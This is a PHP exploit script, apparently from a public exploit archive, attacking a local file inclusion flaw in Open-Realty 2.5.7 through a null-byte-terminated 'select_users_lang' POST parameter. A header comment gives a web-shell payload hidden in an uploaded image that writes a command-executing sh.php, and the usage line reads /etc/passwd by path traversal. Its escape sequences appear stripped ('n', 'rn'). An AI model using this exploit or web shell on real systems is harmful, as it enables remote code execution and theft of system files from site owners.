<?php
/*
 * Exploit Title: 
 * Date: 2010-08-18
 * Author: Nikola Petrov
 * Vendor: http://open-realty.org/
 * Version: 2.5.7
 */
	/*
		vulnerable: Open-Realty 2.5.7
		LFI: /index.php
		
		upload image with: <?php system("echo "<?php if(isset($_GET["cmd"])) system($_GET["cmd"]); ?>" > sh.php"); ?>
		include the image and sh.php will be generated.
		proceed with sh.php

		MAGIC_QUOTES must be 'off' and %00 must not be replaced with .
	*/

	print "nn#########################################################################n";
	print "#LFI discovery and implementation: Nikola Petrov (vp.nikola@gmail.com)n";
	print "#Date: 05.09.2009n";
	print "#########################################################################nn";

	if($argc < 5) {
		print "usage: $argv[0] host port path file [debug: 1/0]n";
		print "example: $argv[0] localhost 80 / ../../../../../../../../../../../../etc/passwdnnn";
		exit();
	}

	$Host = $argv[1];
	$Port = $argv[2];
	$Path = $argv[3];
	$File = $argv[4];

	function HttpSend($aHost, $aPort, $aPacket) {
		$Response = "";

		if(!$Socket = fsockopen($aHost, $aPort)) {
			print "Error connecting to $aHost:$aPortnn";
			exit();
		}
		
		fputs($Socket, $aPacket);
		
		while(!feof($Socket)) $Response .= fread($Socket, 1024);
		
		fclose($Socket);
		
		return $Response;
	}

	$VulnRequest = "select_users_lang=". $File . "%00";
	
	$Packet  = "POST {$Path} HTTP/1.1rn";
	$Packet .= "Host: {$Host}rn";
	$Packet .= "Content-Type: application/x-www-form-urlencodedrn";
	$Packet .= "Content-Length: " . strlen($VulnRequest) . "rnrn";
	$Packet .= "$VulnRequestn";

	if($argv[5] == 1) print $Packet;

	print HttpSend($Host, $Port, $Packet);
?>